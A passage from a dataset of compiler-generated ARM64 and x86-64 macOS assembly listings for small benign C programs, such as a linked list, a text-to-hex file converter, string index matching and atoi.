== frequence(0, 0)" L_.str.8: ## @.str.8 .asciz "%s" L_.str.9: ## @.str.9 .asciz "frequence... ok\n" L_.str.10: ## @.str.10 .asciz "Bravo ! Tous les tests passent.\n" .subsections_via_symbols
the_stack_data/234517832.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/156394218.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 stur w8, [x29, #-12] ; 4-byte Folded Spill stur wzr, [x29, #-4] mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf ldursw x9, [x29, #-8] adrp x8, _main.ans@PAGE add x8, x8, _main.ans@PAGEOFF ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldur w0, [x29, #-12] ; 4-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__const .p2align 2 ; @main.ans _main.ans: .long 4294967295 ; 0xffffffff .long 9 ; 0x9 .long 18 ; 0x12 .long 108 ; 0x6c .long 198 ; 0xc6 .long 1098 ; 0x44a .long 1998 ; 0x7ce .long 10998 ; 0x2af6 .long 19998 ; 0x4e1e .long 109998 ; 0x1adae .long 199998 ; 0x30d3e .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movslq -8(%rbp), %rcx leaq _main.ans(%rip), %rax movl (%rax,%rcx,4), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__const .p2align 4 ## @main.ans _main.ans: .long 4294967295 ## 0xffffffff .long 9 ## 0x9 .long 18 ## 0x12 .long 108 ## 0x6c .long 198 ## 0xc6 .long 1098 ## 0x44a .long 1998 ## 0x7ce .long 10998 ## 0x2af6 .long 19998 ## 0x4e1e .long 109998 ## 0x1adae .long 199998 ## 0x30d3e .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%d\n" .subsections_via_symbols
the_stack_data/6388515.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _addLast ; -- Begin function addLast .p2align 2 _addLast: ; @addLast .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] mov x0, #16 bl _malloc str x0, [sp, #8] ldur w8, [x29, #-12] ldr x9, [sp, #8] str w8, [x9] ldr x8, [sp, #8] ; kill: def $x9 killed $xzr str xzr, [x8, #8] ldur x8, [x29, #-8] ldr x8, [x8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr x8, [sp, #8] ldur x9, [x29, #-8] str x8, [x9] b LBB0_6 LBB0_2: ldur x8, [x29, #-8] ldr x8, [x8] str x8, [sp] b LBB0_3 LBB0_3: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp] ldr x8, [x8, #8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=1 ldr x8, [sp] ldr x8, [x8, #8] str x8, [sp] b LBB0_3 LBB0_5: ldr x8, [sp, #8] ldr x9, [sp] str x8, [x9, #8] b LBB0_6 LBB0_6: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _printList ; -- Begin function printList .p2align 2 _printList: ; @printList .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] ldur x8, [x29, #-8] str x8, [sp, #16] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_3 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldr x8, [sp, #16] ldr w9, [x8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldr x8, [sp, #16] ldr x8, [x8, #8] str x8, [sp, #16] b LBB1_1 LBB1_3: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #12] ; 4-byte Folded Spill stur wzr, [x29, #-4] add x0, sp, #16 str x0, [sp] ; 8-byte Folded Spill ; kill: def $x8 killed $xzr str xzr, [sp, #16] mov w1, #10 bl _addLast ldr x0, [sp] ; 8-byte Folded Reload mov w1, #20 bl _addLast ldr x0, [sp] ; 8-byte Folded Reload mov w1, #30 bl _addLast ldr x0, [sp, #16] bl _printList ldr w0, [sp, #12] ; 4-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d->" l_.str.1: ; @.str.1 .asciz "NULL\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _addLast ## -- Begin function addLast .p2align 4, 0x90 _addLast: ## @addLast .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movl $16, %edi callq _malloc movq %rax, -24(%rbp) movl -12(%rbp), %ecx movq -24(%rbp), %rax movl %ecx, (%rax) movq -24(%rbp), %rax movq $0, 8(%rax) movq -8(%rbp), %rax cmpq $0, (%rax) jne LBB0_2 ## %bb.1: movq -24(%rbp), %rcx movq -8(%rbp), %rax movq %rcx, (%rax) jmp LBB0_6 LBB0_2: movq -8(%rbp), %rax movq (%rax), %rax movq %rax, -32(%rbp) LBB0_3: ## =>This Inner Loop Header: Depth=1 movq -32(%rbp), %rax cmpq $0, 8(%rax) je LBB0_5 ## %bb.4: ## in Loop: Header=BB0_3 Depth=1 movq -32(%rbp), %rax movq 8(%rax), %rax movq %rax, -32(%rbp) jmp LBB0_3 LBB0_5: movq -24(%rbp), %rcx movq -32(%rbp), %rax movq %rcx, 8(%rax) LBB0_6: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _printList ## -- Begin function printList .p2align 4, 0x90 _printList: ## @printList .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax movq %rax, -16(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 cmpq $0, -16(%rbp) je LBB1_3 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movq -16(%rbp), %rax movl (%rax), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movq -16(%rbp), %rax movq 8(%rax), %rax movq %rax, -16(%rbp) jmp LBB1_1 LBB1_3: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movq $0, -16(%rbp) leaq -16(%rbp), %rdi movl $10, %esi callq _addLast leaq -16(%rbp), %rdi movl $20, %esi callq _addLast leaq -16(%rbp), %rdi movl $30, %esi callq _addLast movq -16(%rbp), %rdi callq _printList xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d->" L_.str.1: ## @.str.1 .asciz "NULL\n" .subsections_via_symbols
the_stack_data/243893481.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _a2hF ; -- Begin function a2hF .p2align 2 _a2hF: ; @a2hF .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str wzr, [sp, #12] str wzr, [sp, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _fopen str x0, [sp, #16] str wzr, [sp, #12] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #256 cset w8, ge tbnz w8, #0, LBB0_9 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur x0, [x29, #-8] bl _getc str w0, [sp, #8] adds w8, w0, #1 cset w8, eq tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr x0, [sp, #16] ldr w9, [sp, #8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF bl _fprintf b LBB0_5 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 ldr x0, [sp, #16] mov x8, sp str xzr, [x8] adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF bl _fprintf b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 mov w10, #4 sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_7 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 ldr x0, [sp, #16] adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _fprintf b LBB0_7 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_1 LBB0_9: ldr x0, [sp, #16] bl _fclose mov w0, #1 ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] str wzr, [sp, #12] str wzr, [sp, #8] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _fopen str x0, [sp, #16] ldr x8, [sp, #16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf mov w0, #1 bl _exit LBB1_2: ldr x0, [sp, #16] bl _a2hF ldr x0, [sp, #16] bl _fclose adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf mov w0, #0 bl _exit .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "./gen/pTextHEX" l_.str.1: ; @.str.1 .asciz "w" l_.str.2: ; @.str.2 .asciz "%02x" l_.str.3: ; @.str.3 .asciz "\r\n" l_.str.4: ; @.str.4 .asciz "./gen/pText.txt" l_.str.5: ; @.str.5 .asciz "r" l_.str.6: ; @.str.6 .asciz "*** ERROR -> Input file not found \"pText.txt\"\r\n" l_.str.7: ; @.str.7 .asciz "Completed\n\r" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _a2hF ## -- Begin function a2hF .p2align 4, 0x90 _a2hF: ## @a2hF .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl $0, -20(%rbp) movl $0, -24(%rbp) leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi callq _fopen movq %rax, -16(%rbp) movl $0, -20(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $256, -20(%rbp) ## imm = 0x100 jge LBB0_9 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -8(%rbp), %rdi callq _getc movl %eax, -24(%rbp) cmpl $-1, %eax je LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movq -16(%rbp), %rdi movl -24(%rbp), %edx leaq L_.str.2(%rip), %rsi movb $0, %al callq _fprintf jmp LBB0_5 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 movq -16(%rbp), %rdi leaq L_.str.2(%rip), %rsi xorl %edx, %edx movb $0, %al callq _fprintf LBB0_5: ## in Loop: Header=BB0_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl $4, %ecx cltd idivl %ecx cmpl $0, %edx jne LBB0_7 ## %bb.6: ## in Loop: Header=BB0_1 Depth=1 movq -16(%rbp), %rdi leaq L_.str.3(%rip), %rsi movb $0, %al callq _fprintf LBB0_7: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_8 LBB0_8: ## in Loop: Header=BB0_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB0_1 LBB0_9: movq -16(%rbp), %rdi callq _fclose movl $1, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl $0, -20(%rbp) movl $0, -24(%rbp) leaq L_.str.4(%rip), %rdi leaq L_.str.5(%rip), %rsi callq _fopen movq %rax, -16(%rbp) cmpq $0, -16(%rbp) jne LBB1_2 ## %bb.1: leaq L_.str.6(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _printf movl $1, %edi callq _exit LBB1_2: movq -16(%rbp), %rdi callq _a2hF movq -16(%rbp), %rdi callq _fclose leaq L_.str.7(%rip), %rdi xorl %eax, %eax movl %eax, -28(%rbp) ## 4-byte Spill callq _printf movl -28(%rbp), %edi ## 4-byte Reload callq _exit .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "./gen/pTextHEX" L_.str.1: ## @.str.1 .asciz "w" L_.str.2: ## @.str.2 .asciz "%02x" L_.str.3: ## @.str.3 .asciz "\r\n" L_.str.4: ## @.str.4 .asciz "./gen/pText.txt" L_.str.5: ## @.str.5 .asciz "r" L_.str.6: ## @.str.6 .asciz "*** ERROR -> Input file not found \"pText.txt\"\r\n" L_.str.7: ## @.str.7 .asciz "Completed\n\r" .subsections_via_symbols
the_stack_data/90763292.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov x9, sp sub x8, x29, #12 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf mov w8, #2 stur w8, [x29, #-8] mov w8, #1 str w8, [sp, #16] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-8] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur w9, [x29, #-8] ldr w8, [sp, #16] mul w8, w8, w9 str w8, [sp, #16] b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] b LBB0_1 LBB0_4: ldr w9, [sp, #16] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi leaq -12(%rbp), %rsi movb $0, %al callq _scanf movl $2, -8(%rbp) movl $1, -16(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -8(%rbp), %eax cmpl -12(%rbp), %eax jge LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -8(%rbp), %eax imull -16(%rbp), %eax movl %eax, -16(%rbp) ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB0_1 LBB0_4: movl -16(%rbp), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%d\n" .subsections_via_symbols
the_stack_data/145452432.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _atoi ; -- Begin function atoi .p2align 2 _atoi: ; @atoi .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] ldr x0, [sp, #8] mov x1, #0 mov w2, #0 bl _strtol mov x8, x0 str w8, [sp, #4] ldr w0, [sp, #4] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _atoi ## -- Begin function atoi .p2align 4, 0x90 _atoi: ## @atoi .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rdi xorl %eax, %eax movl %eax, %esi xorl %edx, %edx callq _strtol ## kill: def $eax killed $eax killed $rax movl %eax, -12(%rbp) movl -12(%rbp), %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/82650.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 sub sp, sp, #2032 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #20] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf add x0, sp, #1024 mov w1, #1000 bl _mygetline adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 add x0, sp, #24 mov w1, #1000 bl _mygetline subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 add x0, sp, #24 add x1, sp, #1024 bl _strindex mov x9, sp ; implicit-def: $x8 mov x8, x0 str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_1 LBB0_3: ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: bl ___stack_chk_fail LBB0_5: mov w0, #0 add sp, sp, #2032 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _mygetline ; -- Begin function mygetline .p2align 2 _mygetline: ; @mygetline .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] str wzr, [sp, #16] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] subs w8, w8, #1 stur w8, [x29, #-12] subs w8, w8, #0 cset w8, eq mov w9, #0 str w9, [sp, #8] ; 4-byte Folded Spill tbnz w8, #0, LBB1_4 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 bl _getchar str w0, [sp, #12] adds w8, w0, #1 cset w8, eq mov w9, #0 str w9, [sp, #8] ; 4-byte Folded Spill tbnz w8, #0, LBB1_4 b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #12] subs w8, w8, #10 cset w8, ne str w8, [sp, #8] ; 4-byte Folded Spill b LBB1_4 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #8] ; 4-byte Folded Reload tbz w8, #0, LBB1_6 b LBB1_5 LBB1_5: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #12] ldur x9, [x29, #-8] ldrsw x10, [sp, #16] mov x11, x10 add w11, w11, #1 str w11, [sp, #16] strb w8, [x9, x10] b LBB1_1 LBB1_6: ldur x8, [x29, #-8] ldrsw x9, [sp, #16] add x8, x8, x9 strb wzr, [x8] ldr w0, [sp, #16] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _strindex ; -- Begin function strindex .p2align 2 _strindex: ; @strindex .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] str x1, [sp, #24] ldur x0, [x29, #-16] bl _strlen mov x8, x0 str w8, [sp, #20] ldr x0, [sp, #24] bl _strlen mov x8, x0 str w8, [sp, #16] ldr w8, [sp, #20] subs w8, w8, #1 str w8, [sp, #12] b LBB2_1 LBB2_1: ; =>This Loop Header: Depth=1 ; Child Loop BB2_3 Depth 2 ldr w8, [sp, #12] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB2_12 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #16] subs w8, w8, #1 str w8, [sp, #8] str wzr, [sp, #4] b LBB2_3 LBB2_3: ; Parent Loop BB2_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #8] subs w8, w8, #0 cset w8, lt mov w9, #0 str w9, [sp] ; 4-byte Folded Spill tbnz w8, #0, LBB2_5 b LBB2_4 LBB2_4: ; in Loop: Header=BB2_3 Depth=2 ldur x8, [x29, #-16] ldr w9, [sp, #12] ldr w10, [sp, #4] subs w9, w9, w10 ldrsb w8, [x8, w9, sxtw] ldr x9, [sp, #24] ldrsw x10, [sp, #8] ldrsb w9, [x9, x10] subs w8, w8, w9 cset w8, eq str w8, [sp] ; 4-byte Folded Spill b LBB2_5 LBB2_5: ; in Loop: Header=BB2_3 Depth=2 ldr w8, [sp] ; 4-byte Folded Reload tbz w8, #0, LBB2_8 b LBB2_6 LBB2_6: ; in Loop: Header=BB2_3 Depth=2 b LBB2_7 LBB2_7: ; in Loop: Header=BB2_3 Depth=2 ldr w8, [sp, #8] subs w8, w8, #1 str w8, [sp, #8] ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB2_3 LBB2_8: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #8] adds w8, w8, #1 cset w8, ne tbnz w8, #0, LBB2_10 b LBB2_9 LBB2_9: ldr w8, [sp, #12] ldr w9, [sp, #16] subs w8, w8, w9 add w8, w8, #1 stur w8, [x29, #-4] b LBB2_13 LBB2_10: ; in Loop: Header=BB2_1 Depth=1 b LBB2_11 LBB2_11: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #12] subs w8, w8, #1 str w8, [sp, #12] b LBB2_1 LBB2_12: mov w8, #-1 stur w8, [x29, #-4] b LBB2_13 LBB2_13: ldur w0, [x29, #-4] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Input the pattern: " l_.str.1: ; @.str.1 .asciz "Input some strings:\n" l_.str.2: ; @.str.2 .asciz "Result: %d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $2032, %rsp ## imm = 0x7F0 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -2020(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq -1008(%rbp), %rdi movl $1000, %esi ## imm = 0x3E8 callq _mygetline leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf LBB0_1: ## =>This Inner Loop Header: Depth=1 leaq -2016(%rbp), %rdi movl $1000, %esi ## imm = 0x3E8 callq _mygetline cmpl $0, %eax je LBB0_3 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 leaq -2016(%rbp), %rdi leaq -1008(%rbp), %rsi callq _strindex movl %eax, %esi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf jmp LBB0_1 LBB0_3: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_5 ## %bb.4: xorl %eax, %eax addq $2032, %rsp ## imm = 0x7F0 popq %rbp retq LBB0_5: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _mygetline ## -- Begin function mygetline .p2align 4, 0x90 _mygetline: ## @mygetline .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl %esi, 